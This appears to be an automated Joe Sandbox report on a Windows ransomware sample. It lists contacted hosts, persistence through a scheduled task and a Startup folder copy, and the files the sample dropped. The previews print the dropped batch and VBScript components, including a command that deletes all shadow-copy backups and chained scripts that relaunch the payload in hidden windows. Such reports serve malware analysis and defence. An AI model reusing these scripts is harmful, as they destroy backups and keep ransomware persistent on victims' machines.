                                                            https://dynamic.tsvchost.exe, 00000006.00000002.1364826982.000001F12F627000.00000004.00000020.00020000.00000000.sdmpfalse
                                                              		high
                                                              http://api.ipify.org/)BiXS3FRoLe.exe, 00000000.00000002.2504707100.0000000000D05000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                		high
                                                                https://dev.virtualearth.net/REST/v1/Routes/Transitsvchost.exe, 00000006.00000003.1364134995.000001F12F66D000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                  		high
                                                                  https://dev.ditu.live.com/webservices/v1/LoggingService/LoggingService.svc/Log?svchost.exe, 00000006.00000002.1364893771.000001F12F62B000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                    		high
                                                                    https://t0.ssl.ak.tiles.virtualearth.net/tiles/gensvchost.exe, 00000006.00000003.1263372892.000001F12F639000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                      		high
                                                                      http://api.ipify.org/BiXS3FRoLe.exe, 00000000.00000002.2503580325.0000000000769000.00000004.00000010.00020000.00000000.sdmp, BiXS3FRoLe.exe, 00000000.00000002.2504707100.0000000000C8F000.00000004.00000020.00020000.00000000.sdmp, BiXS3FRoLe.exe, 00000000.00000002.2504707100.0000000000D05000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                        		high
                                                                        https://tiles.virtualearth.net/tiles/cmd/StreetSideBubbleMetaData?north=svchost.exe, 00000006.00000002.1365005778.000001F12F65A000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000006.00000003.1364417613.000001F12F659000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                          		high
                                                                          https://dynamic.api.tiles.ditu.live.com/odvs/gdv?pv=1&r=svchost.exe, 00000006.00000002.1365045316.000001F12F664000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000006.00000003.1364190386.000001F12F663000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                            		high
                                                                            http://www.bingmapsportal.comsvchost.exe, 00000006.00000002.1364826982.000001F12F613000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                              		high
                                                                              https://dev.ditu.live.com/REST/v1/Locationssvchost.exe, 00000006.00000003.1364134995.000001F12F66D000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                		high
                                                                                https://dev.virtualearth.net/REST/v1/Imagery/Copyright/svchost.exe, 00000006.00000002.1365045316.000001F12F664000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000006.00000002.1364893771.000001F12F62B000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000006.00000003.1364357788.000001F12F65B000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000006.00000003.1364190386.000001F12F663000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                  		high
                                                                                  https://ecn.dev.virtualearth.net/REST/v1/Imagery/Copyright/svchost.exe, 00000006.00000002.1365064697.000001F12F669000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000006.00000002.1364893771.000001F12F62B000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000006.00000003.1364172289.000001F12F668000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                    		high
                                                                                    https://dynamic.api.tiles.ditu.live.com/odvs/gd?pv=1&r=svchost.exe, 00000006.00000003.1364011107.000001F12F655000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000006.00000003.1364190386.000001F12F663000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                      		high

                                                                                      World Map of Contacted IPs

                                                                                      • No. of IPs < 25%
                                                                                      • 25% < No. of IPs < 50%
                                                                                      • 50% < No. of IPs < 75%
                                                                                      • 75% < No. of IPs

                                                                                      Public IPs

                                                                                      IPDomainCountryFlagASNASN NameMalicious
                                                                                      104.26.13.205
                                                                                      		api.ipify.orgUnited States
                                                                                      		13335CLOUDFLARENETUSfalse
                                                                                      185.147.34.53
                                                                                      		unknownIceland
                                                                                      		207083HOSTSLIM-GLOBAL-NETWORKNLtrue

                                                                                      General Information

                                                                                      Joe Sandbox version:41.0.0 Charoite
                                                                                      Analysis ID:1569984
                                                                                      Start date and time:2024-12-06 13:41:25 +01:00
                                                                                      Joe Sandbox product:CloudBasic
                                                                                      Overall analysis duration:0h 8m 16s
                                                                                      Hypervisor based Inspection enabled:false
                                                                                      Report type:full
                                                                                      Cookbook file name:default.jbs
                                                                                      Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                                                                                      Number of analysed new started processes analysed:64
                                                                                      Number of new started drivers analysed:0
                                                                                      Number of existing processes analysed:0
                                                                                      Number of existing drivers analysed:0
                                                                                      Number of injected processes analysed:0
                                                                                      Technologies:
                                                                                      • HCA enabled
                                                                                      • EGA enabled
                                                                                      • AMSI enabled
                                                                                      Analysis Mode:default
                                                                                      Analysis stop reason:Timeout
                                                                                      Sample name:BiXS3FRoLe.exe
                                                                                      renamed because original name is a hash value
                                                                                      Original Sample Name:1e89b482a11bdda467322cca6a8a06621fc834587bfeb682cda22ee93885fe84.exe
                                                                                      Detection:MAL
                                                                                      Classification:mal100.rans.troj.adwa.evad.winEXE@118/19@1/2
                                                                                      EGA Information:
                                                                                      • Successful, ratio: 100%
                                                                                      HCA Information:
                                                                                      • Successful, ratio: 98%
                                                                                      • Number of executed functions: 54
                                                                                      • Number of non-executed functions: 182
                                                                                      Cookbook Comments:
                                                                                      • Found application associated with file extension: .exe

                                                                                      Warnings

                                                                                      • Exclude process from analysis (whitelisted): dllhost.exe, SIHClient.exe, WmiPrvSE.exe
                                                                                      • Excluded domains from analysis (whitelisted): otelrules.azureedge.net, slscr.update.microsoft.com, ctldl.windowsupdate.com, fe3cr.delivery.mp.microsoft.com
                                                                                      • Not all processes where analyzed, report is missing behavior information
                                                                                      • Report size exceeded maximum capacity and may have missing behavior information.
                                                                                      • Report size exceeded maximum capacity and may have missing disassembly code.
                                                                                      • Report size getting too big, too many NtOpenKeyEx calls found.
                                                                                      • Report size getting too big, too many NtProtectVirtualMemory calls found.
                                                                                      • Report size getting too big, too many NtQueryValueKey calls found.
                                                                                      • VT rate limit hit for: BiXS3FRoLe.exe

                                                                                      Simulations

                                                                                      Behavior and APIs

                                                                                      TimeTypeDescription
                                                                                      07:43:17API Interceptor1x Sleep call for process: MpCmdRun.exe modified
                                                                                      13:42:19Task SchedulerRun new task: Microsoft_Auto_Scheduler path: "C:\Users\user\AppData\S-2153.bat"
                                                                                      13:42:19AutostartRun: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Xinfecter.exe

                                                                                      Joe Sandbox View / Context

                                                                                      IPs

                                                                                      MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                      104.26.13.205Simple1.exeGet hashmaliciousUnknownBrowse
                                                                                      • api.ipify.org/
                                                                                      2b7cu0KwZl.exeGet hashmaliciousUnknownBrowse
                                                                                      • api.ipify.org/
                                                                                      file.exeGet hashmaliciousUnknownBrowse
                                                                                      • api.ipify.org/
                                                                                      file.exeGet hashmaliciousLummaC, PrivateLoader, Stealc, VidarBrowse
                                                                                      • api.ipify.org/
                                                                                      file.exeGet hashmaliciousLummaC, PrivateLoader, Stealc, VidarBrowse
                                                                                      • api.ipify.org/
                                                                                      file.exeGet hashmaliciousRDPWrap ToolBrowse
                                                                                      • api.ipify.org/
                                                                                      Prismifyr-Install.exeGet hashmaliciousNode StealerBrowse
                                                                                      • api.ipify.org/
                                                                                      file.exeGet hashmaliciousLummaC, PrivateLoader, Stealc, VidarBrowse
                                                                                      • api.ipify.org/
                                                                                      file.exeGet hashmaliciousLummaC, RDPWrap Tool, LummaC Stealer, VidarBrowse
                                                                                      • api.ipify.org/
                                                                                      file.exeGet hashmaliciousUnknownBrowse
                                                                                      • api.ipify.org/
                                                                                      185.147.34.53GD8c7ARn8q.exeGet hashmaliciousTrojanRansomBrowse
                                                                                        8AbMCL2dxM.exeGet hashmaliciousRCRU64, TrojanRansomBrowse
                                                                                          Help.File@zohomail.eu_Fast.exeGet hashmaliciousTrojanRansomBrowse
                                                                                            Xinfecter.exeGet hashmaliciousTrojanRansomBrowse
                                                                                              Ross.dec1966@gmail.com_Fast.bin.exeGet hashmaliciousBabuk, Chaos, Conti, RegretLocker, TrojanRansomBrowse
                                                                                                12.exe1Get hashmaliciousBTC, Conti, Neshta, RegretLocker, TrojanRansomBrowse
                                                                                                  DttL6H1DqQ.exeGet hashmaliciousBabuk, Chaos, ContiBrowse
                                                                                                    PAvH6odjUO.exeGet hashmaliciousVoidcryptBrowse

                                                                                                      Domains

                                                                                                      MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                                      api.ipify.orgGD8c7ARn8q.exeGet hashmaliciousTrojanRansomBrowse
                                                                                                      • 104.26.12.205
                                                                                                      8AbMCL2dxM.exeGet hashmaliciousRCRU64, TrojanRansomBrowse
                                                                                                      • 104.26.12.205
                                                                                                      Simple1.exeGet hashmaliciousUnknownBrowse
                                                                                                      • 172.67.74.152
                                                                                                      Simple1.exeGet hashmaliciousUnknownBrowse
                                                                                                      • 104.26.13.205
                                                                                                      Simple2.exeGet hashmaliciousUnknownBrowse
                                                                                                      • 104.26.12.205
                                                                                                      Simple2.exeGet hashmaliciousUnknownBrowse
                                                                                                      • 172.67.74.152
                                                                                                      systemConfigChecker.exeGet hashmaliciousUnknownBrowse
                                                                                                      • 172.67.74.152
                                                                                                      systemConfigChecker.exeGet hashmaliciousUnknownBrowse
                                                                                                      • 172.67.74.152
                                                                                                      kYGxoN4JVW.batGet hashmaliciousUnknownBrowse
                                                                                                      • 172.67.74.152
                                                                                                      REQUEST FOR HOPPER SCALE AND CONVEYOR MACHINE.pdf.exeGet hashmaliciousAgentTeslaBrowse
                                                                                                      • 104.26.13.205

                                                                                                      ASNs

                                                                                                      MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                                      HOSTSLIM-GLOBAL-NETWORKNLGD8c7ARn8q.exeGet hashmaliciousTrojanRansomBrowse
                                                                                                      • 185.147.34.53
                                                                                                      8AbMCL2dxM.exeGet hashmaliciousRCRU64, TrojanRansomBrowse
                                                                                                      • 185.147.34.53
                                                                                                      la.bot.sparc.elfGet hashmaliciousUnknownBrowse
                                                                                                      • 213.166.86.57
                                                                                                      cenSXPimaG.elfGet hashmaliciousMirai, OkiruBrowse
                                                                                                      • 213.166.86.22
                                                                                                      SWIFT COPY.exeGet hashmaliciousFormBookBrowse
                                                                                                      • 103.214.4.45
                                                                                                      REMITTANCE SLIP.exeGet hashmaliciousFormBookBrowse
                                                                                                      • 103.214.4.45
                                                                                                      STATEMENT OF ACCOUNT.exeGet hashmaliciousFormBookBrowse
                                                                                                      • 103.214.4.45
                                                                                                      PAYMENT SWIFT.exeGet hashmaliciousFormBookBrowse
                                                                                                      • 103.214.4.45
                                                                                                      PAYMENT RECEIPT.exeGet hashmaliciousFormBookBrowse
                                                                                                      • 103.214.4.45
                                                                                                      hsbc Wire copy.exeGet hashmaliciousFormBookBrowse
                                                                                                      • 103.214.4.45
                                                                                                      CLOUDFLARENETUSGD8c7ARn8q.exeGet hashmaliciousTrojanRansomBrowse
                                                                                                      • 104.26.12.205
                                                                                                      8AbMCL2dxM.exeGet hashmaliciousRCRU64, TrojanRansomBrowse
                                                                                                      • 104.26.12.205
                                                                                                      file.exeGet hashmaliciousLummaC StealerBrowse
                                                                                                      • 104.21.16.9
                                                                                                      https://rnicrosoft-secured-office.squarespace.com/sharepoint?e=test@test.com.auGet hashmaliciousHTMLPhisherBrowse
                                                                                                      • 104.21.25.148
                                                                                                      https://i.postimg.cc/y6hBTtv7/png-Hand-SAward.pngGet hashmaliciousHTMLPhisherBrowse
                                                                                                      • 104.21.85.204
                                                                                                      file.exeGet hashmaliciousLummaC StealerBrowse
                                                                                                      • 172.67.165.166
                                                                                                      phish_alert_sp2_2.0.0.0.emlGet hashmaliciousUnknownBrowse
                                                                                                      • 104.18.69.40
                                                                                                      Simple1.exeGet hashmaliciousUnknownBrowse
                                                                                                      • 172.67.74.152
                                                                                                      Pr9cqW75nY.lnkGet hashmaliciousUnknownBrowse
                                                                                                      • 104.18.10.207
                                                                                                      G3vWD786PN.lnkGet hashmaliciousUnknownBrowse
                                                                                                      • 104.18.11.207

                                                                                                      JA3 Fingerprints

                                                                                                      No context

                                                                                                      Dropped Files

                                                                                                      No context

                                                                                                      Created / dropped Files

                                                                                                      C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\Q8X2NUFH\KYD62ZYM.txt

                                                                                                      Download File
                                                                                                      Process:C:\Users\user\Desktop\BiXS3FRoLe.exe
                                                                                                      File Type:ASCII text, with no line terminators
                                                                                                      Category:modified
                                                                                                      Size (bytes):12
                                                                                                      Entropy (8bit):2.6258145836939115
                                                                                                      Encrypted:false
                                                                                                      SSDEEP:3:fuM9:2I
                                                                                                      MD5:E4A5E3AE7A904A86A50AE5FC1A38F374
                                                                                                      SHA1:0B536BF59DE491CCC2CAA8AE52200CD6B61364E9
                                                                                                      SHA-256:4EF53CF7C95DBE1BE9AC5E3D7465B91B911FD5C198EB161A55AF5579D9390C1A
                                                                                                      SHA-512:17D3508E7E847B91E84A06BA32BAD9A6CEC55373EE877E1163AB74EF4E18A72C38DD43897BE21E26556CBDE58DF9446E06B59B2BB37CC0321B5228D57C80A146
                                                                                                      Malicious:false
                                                                                                      Preview:8.46.123.228

                                                                                                      C:\Users\user\AppData\N-Save.sys

                                                                                                      Download File
                                                                                                      Process:C:\Users\user\Desktop\BiXS3FRoLe.exe
                                                                                                      File Type:ASCII text, with very long lines (3460), with no line terminators
                                                                                                      Category:dropped
                                                                                                      Size (bytes):3460
                                                                                                      Entropy (8bit):6.016381721433506
                                                                                                      Encrypted:false
                                                                                                      SSDEEP:96:0TN4B2J/vqg6B97NhWVKIrGi4DHoBBF51hJFUJdz:0C2Po95hUJ4cBNHfUT
                                                                                                      MD5:C7C3DBD832C646864700496AD134ED0A
                                                                                                      SHA1:B9A086E16664CF20139497B829585C315825F2BF
                                                                                                      SHA-256:47974541A2D947140126838D0C99953052AE3068A3D569B9D7D0FAAECCDFA2FE
                                                                                                      SHA-512:31B48418A0A7145374BCF2E3B6E4DAD43EBBF276F608890EC686133F7EBF4450AE4DBA3B98FA2AA49807B68A74F74B74D435627AF43B5C9D0380D29B62E128D4
                                                                                                      Malicious:true
                                                                                                      Preview:$0f3apG3JmpPJ2ELWkOavNuQU2tPswQTl8iqYh8cGxridJPxH9L+5HxNVetJgDzqndMlnV7e4b/agodsxVFzuKAIcCJMZDPDgB8ylWnJvZ005QVq7y70mFrOOcbJIFO6B4aVDe2RVI1C1UrbxxjpYw2e3uaKQKnhvJHr9JXJUNn3GQ8vbNzFuptzF+WQ4xinN25+qjFnXM3RRok9rItpGkp2pndprYb8obJNcemIqn0DXQWlK2hg9bkowcwLD2RNLDStew04NrD5kQxkkgtPlvnMXSjQbrletL8Es4fLByq2YE88dh1q9DjgSu2fyK8GEU3prT3wpNsXUhW57a5fsKXg==$1kblXSyCY1np+z59QF0xNhr2jeczI7DC61Xx/iWwOO7iQJUPv3LPgvR17GXDnhjjwZTrT4DtTefAjZu1AAJ6pLZ3TUfdOibmhSUuISnlX26Ok0VzT+s4bjCWpTUlNW5+7jKcq4cucduSY3AjNuGuYBjnZzpLVRYU21QL47KKPJt+TayH6d/MI6YoZ6I0VnMWBkdpCz8Zg3QAa1/Q6fWZ/Jp0ZkPRpQ9ayvGCfwkBaeEWNxDXzhry0A+G2CDd9zjwRX0XeFg/LSkbwibeC4xnWjqAgjEIlHFv/OTCuV5zbEWUluuRVQdkKqsOzdSOJWPkeKnFm35WgK4ySKMAEAjgZyQ==$2Iz1PXlLv5yrzpW+3OAjCL2BRZdHA+DaPXSYVJQ/hwy8PDltISGRxYyUAMeG3zInY7IFgLNZf9Bp1q8VtX2mjF2nydhbfTcjueR4XNrO5Zt2wt67Ti0RWCYefaD7YoQv32qtnNukq4AWG1aNZa7pApCamxiIzN/q0CJPs3MzzTxlmEAo/CMIukeuBYbwSXI0gfkCHT+PjPctg9y5Q4LkK+QxyvbCrqzqZH99a/9aOjHEtmzgVgAyLzLc3EUWlcLndTVZHpIcQZk2a6xVohFIM62BlLHFM1T3KhSY6Fs3MMWh2NSOAIk

                                                                                                      C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Xinfecter.exe

                                                                                                      Download File
                                                                                                      Process:C:\Users\user\Desktop\BiXS3FRoLe.exe
                                                                                                      File Type:PE32 executable (console) Intel 80386, for MS Windows
                                                                                                      Category:dropped
                                                                                                      Size (bytes):1257984
                                                                                                      Entropy (8bit):6.5880778432190095
                                                                                                      Encrypted:false
                                                                                                      SSDEEP:24576:sA4Lon3mf91eozjjwgCT13ssRJRuTB4yWTrUa+9MoK2jzblKPBvoIGXw1:4LO01eoz7a1JRuTBYrMMajzblqBvoIG+
                                                                                                      MD5:8F807535948B5E93317BAF48A4D0E69D
                                                                                                      SHA1:9C3A19D95EBD7D43CC37437237FBC75EBD541BF0
                                                                                                      SHA-256:1E89B482A11BDDA467322CCA6A8A06621FC834587BFEB682CDA22EE93885FE84
                                                                                                      SHA-512:B12CAB19E0E4181164F88B8B64EE9E03BD01D7AABA500BDF86F886D0050BEF1A3D420DD5D395CA60059E348324458E9F63A06CA9A9EB202D6302AAE5B4E7C73A
                                                                                                      Malicious:true
                                                                                                      Antivirus:
                                                                                                      • Antivirus: Avira, Detection: 100%
                                                                                                      • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                                                      • Antivirus: ReversingLabs, Detection: 84%
                                                                                                      Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........Jid.+.7.+.7.+.7,..7.+.7,..7++.7,..7.+.7,A.6.+.7,A.6.+.7,A.6.+.7.S.7.+.7.+.7A+.7.@.6.+.7.@.6.+.7.@.7.+.7.@.6.+.7Rich.+.7................PE..L....;.e............................1........0....@.......................................@.....................................................................(...pV..8...................LW.......V..@............0..(............................text............................... ..`.rdata.......0......................@..@.data...x...........................@....rsrc................X..............@..@.reloc..(............Z..............@..B................................................................................................................................................................................................................................................................................................

                                                                                                      C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Xinfecter.exe:Zone.Identifier

                                                                                                      Download File
                                                                                                      Process:C:\Users\user\Desktop\BiXS3FRoLe.exe
                                                                                                      File Type:ASCII text, with CRLF line terminators
                                                                                                      Category:dropped
                                                                                                      Size (bytes):26
                                                                                                      Entropy (8bit):3.95006375643621
                                                                                                      Encrypted:false
                                                                                                      SSDEEP:3:ggPYV:rPYV
                                                                                                      MD5:187F488E27DB4AF347237FE461A079AD
                                                                                                      SHA1:6693BA299EC1881249D59262276A0D2CB21F8E64
                                                                                                      SHA-256:255A65D30841AB4082BD9D0EEA79D49C5EE88F56136157D8D6156AEF11C12309
                                                                                                      SHA-512:89879F237C0C051EBE784D0690657A6827A312A82735DA42DAD5F744D734FC545BEC9642C19D14C05B2F01FF53BC731530C92F7327BB7DC9CDE1B60FB21CD64E
                                                                                                      Malicious:true
                                                                                                      Preview:[ZoneTransfer]....ZoneId=0

                                                                                                      C:\Users\user\AppData\S-2153.bat

                                                                                                      Download File
                                                                                                      Process:C:\Users\user\Desktop\BiXS3FRoLe.exe
                                                                                                      File Type:DOS batch file, ASCII text, with CRLF line terminators
                                                                                                      Category:dropped
                                                                                                      Size (bytes):138
                                                                                                      Entropy (8bit):4.970414275542141
                                                                                                      Encrypted:false
                                                                                                      SSDEEP:3:mKDD/j2hFHTnmTPcYWA6/hEREVdPTHAF6vWEzn9TmTPcYWA6/hEREVdPTHAoU:hGh9TnmTPYA6/Si3rHV7TQTPYA6/Si36
                                                                                                      MD5:82A528CBF39B8EA7E2982E7B2305204C
                                                                                                      SHA1:717836E0E2B304ED7AE239CC1DB0F6F80E0419B1
                                                                                                      SHA-256:616738526C38E04F992B7B9FC60CB7FEB3EE416BF47B69AA2C3A5F1A722A653B
                                                                                                      SHA-512:EFF7654E171DBD9BC471718A7E14EE3C84A9EDF948F4C8863C8107E653BE8BA06BC7A2876D506D6E4AE7EF2280E820D04615EBCD88894EF01B3667D070241DB3
                                                                                                      Malicious:true
                                                                                                      Preview:@echo off..IF EXIST "%SystemDrive%\Users\%username%\AppData\S-8459.vbs" (..start "" "%SystemDrive%\Users\%username%\AppData\S-8459.vbs"..)

                                                                                                      C:\Users\user\AppData\S-6748.bat

                                                                                                      Download File
                                                                                                      Process:C:\Users\user\Desktop\BiXS3FRoLe.exe
                                                                                                      File Type:DOS batch file, ASCII text, with CRLF line terminators
                                                                                                      Category:dropped
                                                                                                      Size (bytes):1843
                                                                                                      Entropy (8bit):5.353426244393048
                                                                                                      Encrypted:false
                                                                                                      SSDEEP:48:NKsoW31hnuYWnui9DW3eq5uhnuYWnuiGhnuYZXXuXzYnc4hg0hLdY:7nkYlihqIkYliGkYZuX2BJnY
                                                                                                      MD5:D1846A426D12CE1263DC4819EAB274C2
                                                                                                      SHA1:7E11F19952D25BB7E4E89BCA8BF494AE057AB6BD
                                                                                                      SHA-256:6F38DC0BCB6EEC8CD367AC358A8166E81AE610DF871BEDA5C7EBDAA08E0ABDAC
                                                                                                      SHA-512:7F47AD159499D35C210F2FC8E01BEC5396974154DEC5636A735954BFAF2E00CC0BACBD72D1A70CD9B599AD3E8BD4FEF13B60508C54E97734433C8907B9B0C62D
                                                                                                      Malicious:true
                                                                                                      Preview:@echo off..tasklist /v | find /I /c "dcdcf" > nul..if "%ERRORLEVEL%" == "0" goto ErrorAlreadyRunning..set lend=deb..vssadmin.exe Delete Shadows /All /Quiet..title dcdcf..goto notend..:ErrorAlreadyRunning..exit..:secthree..tasklist /fi "ImageName eq BiXS3FRoLe.exe" /fo csv 2>NUL | find /I "BiXS3FRoLe.exe">NUL..if "%ERRORLEVEL%"=="0" goto imer..if %lend% == bed (goto akakak)..set lend=bed..IF EXIST "%SystemDrive%\Users\%username%\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Xinfecter.exe" (..start /d "%SystemDrive%\Users\%username%\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\" Xinfecter.exe ..)..:secttwo..tasklist /fi "ImageName eq BiXS3FRoLe.exe" /fo csv 2>NUL | find /I "BiXS3FRoLe.exe">NUL..if "%ERRORLEVEL%"=="0" goto notend..goto secton..:notend..timeout /t 15 /nobreak >NUL..IF NOT EXIST "C:\Users\ReadMe.hta" (..goto secttwo..:secton..IF EXIST "%SystemDrive%\Users\%username%\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Xinfecter.exe"

                                                                                                      C:\Users\user\AppData\S-8459.vbs

                                                                                                      Download File
                                                                                                      Process:C:\Users\user\Desktop\BiXS3FRoLe.exe
                                                                                                      File Type:ASCII text, with CRLF line terminators
                                                                                                      Category:dropped
                                                                                                      Size (bytes):686
                                                                                                      Entropy (8bit):5.1743757294368
                                                                                                      Encrypted:false
                                                                                                      SSDEEP:12:MDhOfTK2Opx6/SYSHFagnXoWHgvvT9vTnMS8h92Mbx6/SYTlZ7D:s6f9/SY7UgDVnMS8j2Mbs/SYTlZH
                                                                                                      MD5:ED7A274FF8AC640416952BFB5D6C927A
                                                                                                      SHA1:6B33CD5B39DB6E9A900336E446F64A137F0A0F42
                                                                                                      SHA-256:4D68E4A7A437EB4A7AD9C7B28BDDA894A68AE41EFBA8A5E4D3A6A930BEBFEEA5
                                                                                                      SHA-512:8F3A4F071550AFE716C5D39601CF1E8559084FBB701E95B28EB7685FED6D8A972E662AD19124A2242FD30C291B8DD1F18F1A2DCF56AC6C98F2BF96BAC91510F3
                                                                                                      Malicious:true
                                                                                                      Preview:Dim strScript..Dim oExec, oWshShell..Dim ComSpec..Set oWshShell = CreateObject("WScript.Shell")..ComSpec = oWshShell.ExpandEnvironmentStrings("%comspec%")..strScript = ComSpec & " /C echo %SystemDrive%\Users\%username%\AppData\S-6748.bat"..Set oExec = oWshShell.Exec (strScript)..Dim outputsxc..outputsxc = oExec.StdOut.ReadAll()..Set fso = CreateObject("Scripting.FileSystemObject")..outputsxc = Replace(outputsxc, vbCr, "")..outputsxc = Replace(outputsxc, vbLf, "")..If (fso.FileExists(outputsxc)) Then..Set WinScriptHost = CreateObject("WScript.Shell")..WinScriptHost.Run Chr(34) & "%SystemDrive%\Users\%username%\AppData\S-6748.bat" & Chr(34), 0..Set WinScriptHost = Nothing..End If

                                                                                                      C:\Windows\ServiceProfiles\LocalService\AppData\Local\Temp\MpCmdRun.log

                                                                                                      Download File
                                                                                                      Process:C:\Program Files\Windows Defender\MpCmdRun.exe
                                                                                                      File Type:Unicode text, UTF-16, little-endian text, with CRLF line terminators
                                                                                                      Category:modified
                                                                                                      Size (bytes):4926
                                                                                                      Entropy (8bit):3.245232885046662
                                                                                                      Encrypted:false
                                                                                                      SSDEEP:48:FaqdF7w8l0+AAHdKoqKFxcxkF28lraqdF72+AAHdKoqKFxcxkF2:cEG+AAsoJjykcE2+AAsoJjykg
                                                                                                      MD5:2D92A5BCFE12C966548378AC8AF3D9ED
                                                                                                      SHA1:4B720F3B0ED1A6410CF9E77940FF62211740B3F7
                                                                                                      SHA-256:D169FE28AC012377CB1CFCCE64C9D09DBF09CEE1E46888D8A1C0DBB918736B3A
                                                                                                      SHA-512:43706EE1BA7F07B6F504900C417B9C9505B3C588ADD5E9160F986E64FF30E026918B02CDC1202EB3161EFE5BDC3EB9255C3BA98FA69F75D93BBBECE71B245404
                                                                                                      Malicious:false
                                                                                                      Preview:..........-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.....M.p.C.m.d.R.u.n.:. .C.o.m.m.a.n.d. .L.i.n.e.:. .".C.:.\.P.r.o.g.r.a.m. .F.i.l.e.s.\.W.i.n.d.o.w.s. .D.e.f.e.n.d.e.r.\.m.p.c.m.d.r.u.n...e.x.e.". .-.w.d.e.n.a.b.l.e..... .S.t.a.r.t. .T.i.m.e.:. .. T.h.u. .. O.c.t. .. 0.5. .. 2.0.2.3. .1.2.:.2.8.:.3.6.........M.p.E.n.s.u.r.e.P.r.o.c.e.s.s.M.i.t.i.g.a.t.i.o.n.P.o.l.i.c.y.:. .h.r. .=. .0.x.1.....W.D.E.n.a.b.l.e.....*.*.*.*.*.*.*.*.*.*.*.*.*.*.*.*.*.*.*.*.*.*.*.*.*.*.*.*.*.*.*.*.*.*.*. .W.S.C. .S.t.a.t.e. .I.n.f.o. .*.*.*.*.*.*.*.*.*.*.*.*.*.*.*.*.*.*.*.*.*.*.*.*.*.....*.*.*.*.*.*.*.*.*.*.*.*.*.*.*.*.*.*.*.*.*.*.*.*.*.*.*.*.*.*.*.*.*.*.*. .A.n.t.i.V.i.r.u.s.P.r.o.d.u.c.t. .*.*.*.*.*.*.*.*.*.*.*.*.*.*.*.*.*.*.*.*.*.*.*.*.*.....d.i.s.p.l.a.y.N.a.m.e. .=. .[.W.i.n.d.o.w.s. .D.e.f.e.n.d.e.r.].....p.a.t.h.T.o.S.i.g.n.e.d.P.r.o.d.u.c.t.E.x.e. .=. .[.w.i.n.d.o.w.s.d.

                                                                                                      C:\Windows\SysMain.sys

                                                                                                      Download File
                                                                                                      Process:C:\Users\user\Desktop\BiXS3FRoLe.exe
                                                                                                      File Type:ASCII text, with very long lines (417), with no line terminators
                                                                                                      Category:dropped
                                                                                                      Size (bytes):417
                                                                                                      Entropy (8bit):5.841000360898856
                                                                                                      Encrypted:false
                                                                                                      SSDEEP:12:BwSxQ0ZYdfRkfG7cuoAFyoQIVVuth+FhKFigxrjav:B7+0ZyR8G7cZWfMPOhKiarU
                                                                                                      MD5:A7221F02BD78D0A59F8DCAB01545BCE1
                                                                                                      SHA1:D3BF656A19490635D242C6FE6A4ED4DCC449106A
                                                                                                      SHA-256:C916825E2FA0D48E9A0F657DF2B6EB76ECC9579DC7A77E1310C15DC81C1F0E41
                                                                                                      SHA-512:2962B0170BB8A54EC6D23C338B4D20181A5875DC05322DD7C474CD79446ABB5689E37F1D88E29CF90CC0182E2332A926D9C30043DD457654486FCFFF5887F5F2
                                                                                                      Malicious:true
                                                                                                      Preview:n7t0MIIBIDANBgkqhkiG9w0BAQEFAAOCAQ0AMIIBCAKCAQEArY/vdbNAh/Il+zaCQIECZ+pNwPY+UeK/h6E+98CE5GcwvBh4t8xSbgH8IsWU1uAaXG9cPTGe66AOwLyOqqQKZK/DksL6ZxvGG3Di+E9FX2u03GnHZv9910p+3mltPDTSKZjn0etnVgGH1nG3n0xf2Z1lQXuJGOekZ0mCxMGoKsIIUlzA37qvWQ9w/D0gl2z+YNLEVfJ39nXbsXG7UU7kEJOhqyD6OKL9qU36Q0ZeczmT4WLYY5OR+Aax4a+LSY3q08FpOJGFXtanqADs7/XZdBmYMyAI0tFGMbp0kgnxDl7597u0bT+/xfW5OdEU3O5rEyu8sO7AvH3F8qS96cXlvwIBEQ==p2h621L0Iu4g8.K0Hh2gq

                                                                                                      \Device\Null

                                                                                                      Download File
                                                                                                      Process:C:\Windows\SysWOW64\find.exe
                                                                                                      File Type:ASCII text, with CRLF line terminators
                                                                                                      Category:dropped
                                                                                                      Size (bytes):50
                                                                                                      Entropy (8bit):4.389275070710713
                                                                                                      Encrypted:false
                                                                                                      SSDEEP:3:HWHJpHSURHXLWupDEIv:HWp8URHbhpoS
                                                                                                      MD5:0F40E88D0E7C7A46EC3C98059170D61E
